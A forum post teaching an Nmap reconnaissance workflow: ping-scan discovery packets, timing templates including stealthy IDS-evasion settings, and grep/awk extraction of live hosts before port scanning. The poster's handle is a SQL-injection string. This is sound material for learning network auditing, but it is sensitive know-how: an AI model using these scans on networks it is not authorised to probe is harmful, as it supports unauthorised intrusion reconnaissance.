Using NMAP with the brain

Started by 'or '1'=1, February 18, 2017, 04:50:37 AM


February 18, 2017, 04:50:37 AM. Last modified: February 18, 2017, 07:41:04 PM by 'or '1'=1

Hey everyone, maybe you have read my posts before... like every day, I try to explain good tips for pentesters... I work attacking real-world targets, which is very different from pentest-cookbook lab environments, so I expect you'll get good information from this thread. Go ahead!

Our good and weird friend, NMAP:

In the real world, security practitioners are often faced with multiple class C's, class B's or, in some cases, even class A networks. We'll use the rest of this article to build a scan strategy for networks of all kinds and sizes, and of course, tips and tricks ;).

If you look at NMAP and the linked reference (link not visible to guests on the forum), you can get an idea of how to work with NMAP. I've built my own approach, and I'll start with it now.

Host discovery:

A methodical scan usually involves performing host discovery first; this prevents scanning large amounts of dead IP space. The discovery methods are listed here:

Code: bash
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping

The option we will focus on in this article is the most popular one and the default for host discovery: -sn ("Ping Scan").

One thing to note about the -sn "Ping Scan" option (formerly known as -sP) is that it does much more than a traditional ICMP echo request. A "Ping scan" consists of the following packets:

ICMP echo request
TCP SYN to 443
TCP ACK to 80
ICMP timestamp request

You can see the sequence in the packet capture screenshot (image not reproduced here).

When you scan a local network, NMAP automatically switches to ARP requests. This makes sense because fewer packets are sent and it's generally more accurate. Firewalls or other systems generally block or report ICMP traffic and filter TCP ports 80 and 443, so such a host would be invisible to the four remote discovery packets listed above. However, hosts typically answer ARP requests, because they are needed to construct packet headers.

For the first packet capture, the scanning host was placed on a different subnet than the targets; this caused Nmap to use the 4 discovery packets shown in the picture. For the second packet capture, the scanning host was placed in the same broadcast range, so ARP was used for discovery. Both packet captures were created with the same discovery scan shown below.

Okay, let's go deeper:

Code: bash
nmap -sn -T4 -oA Discovery <targets>

Options explained:
-sn = "Ping scan"
-T4 = Throttle to aggressive
-oA <basename>= Output in all three formats (normal, XML, greppable)

Throttling Pro-tips:

Aggressive (-T4) throttling is substantially faster than the default Normal (-T3) throttle.

We have rarely (if ever) seen Aggressive scanning crash a host or flood a network. This should be what you start with unless you know of particular hosts that are sensitive to scanning. With that said, if hosts are known to crash on simple scans or become easily flooded, avoid scanning them with -T4 and possibly try Polite (-T2) throttling.

Please realize that -T2 may be up to 10 times slower than -T3, so be patient and only run it on your most sensitive hosts (not hundreds at a time).

More importantly, avoid one-off scans such as version scanning, since these are more likely to crash hosts than the speed of the scan is. Some older SCADA components are known to fall over from simple port scanning, not to mention version scanning. In general, we do not recommend Insane mode (-T5), as this can negatively affect accuracy.

Lastly, we only recommend -T0 or -T1 when trying to be extra stealthy (IDS evasion) and only for scanning a few ports on a few hosts because it will likely be too slow for anything else.

Generate the host-up list

Nmap can scan a huge number of IP addresses with the -iL option. We don't want to scan all the results of the recent discovery scan, because they include both live and dead hosts. Here our friend NMAP helps with its output files; we obtained the full dump with the -oA option:

Code: bash
root@host:~/Tests/Results/nmap/recon/# ls
Discovery.gnmap  Discovery.nmap  Discovery.xml

Files explained:
.nmap = Normal output (what is printed to the screen)
.gnmap = Greppable output
.xml = XML output

We will extract the up hosts from the .gnmap file using grep:

Code: bash
grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > upHost.txt

Cut options explained:
-f = field number (in this case, field 2)
-d = delimiter (in this case, a space)
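As an added example (not from the original post), the same extraction done with awk so it can be reused as a function, plus a sanity check against the "hosts up" count that Nmap writes in the .gnmap footer. The .gnmap content below is constructed for this example; in practice you would point the functions at your own Discovery.gnmap.

```shell
#!/bin/sh
# Added example, not part of the original post.
# Extract live hosts from Nmap greppable output (.gnmap) and cross-check
# the result against the "(N hosts up)" footer Nmap writes at the end.

# Constructed sample .gnmap (not real scan data). Fields are tab-separated
# in real output; awk's default whitespace splitting handles both tabs
# and spaces, so $2 is always the IP address.
SAMPLE_GNMAP=$(mktemp)
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.40 scan initiated Sat Feb 18 04:50:37 2017 as: nmap -sn -T4 -oA Discovery 10.0.0.0/29
Host: 10.0.0.1 ()	Status: Up
Host: 10.0.0.2 (gw.lab.local)	Status: Up
Host: 10.0.0.3 ()	Status: Down
Host: 10.0.0.4 ()	Status: Up
# Nmap done at Sat Feb 18 04:50:40 2017 -- 8 IP addresses (3 hosts up) scanned in 2.51 seconds
EOF

# Print one IP per line for every "Host:" record whose status is Up.
# Equivalent to: grep "Status: Up" file | cut -f 2 -d ' '
extract_up_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }' "$1"
}

# Pull the "N hosts up" count from the footer (handles "1 host up" too).
hosts_up_from_footer() {
    sed -n 's/.*(\([0-9]*\) hosts\{0,1\} up).*/\1/p' "$1"
}

# Write the up-host list and warn if it disagrees with Nmap's own count,
# which usually means the file was truncated or mixed with another scan.
UP_LIST=$(mktemp)
extract_up_hosts "$SAMPLE_GNMAP" > "$UP_LIST"
FOUND=$(wc -l < "$UP_LIST" | tr -d ' ')
CLAIMED=$(hosts_up_from_footer "$SAMPLE_GNMAP")
if [ "$FOUND" != "$CLAIMED" ]; then
    echo "warning: extracted $FOUND hosts but footer says $CLAIMED" >&2
fi
echo "up hosts written to $UP_LIST ($FOUND hosts)"
```

The footer check costs nothing and catches the common mistake of feeding a partially written .gnmap (for example, from a scan that was interrupted) into the next port-scan stage with -iL.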

Port discovery:

Okay, now that we have our up hosts, we can start port discovery on them. Keep in mind that depending on whether you have many up hosts or only a few, you will select different kinds of scans:

  • Most common ports
  • Full port scans

Source: (link not visible to guests on the forum)

So, to sum up: TOP 1000 TCP ~ TOP 1000 UDP.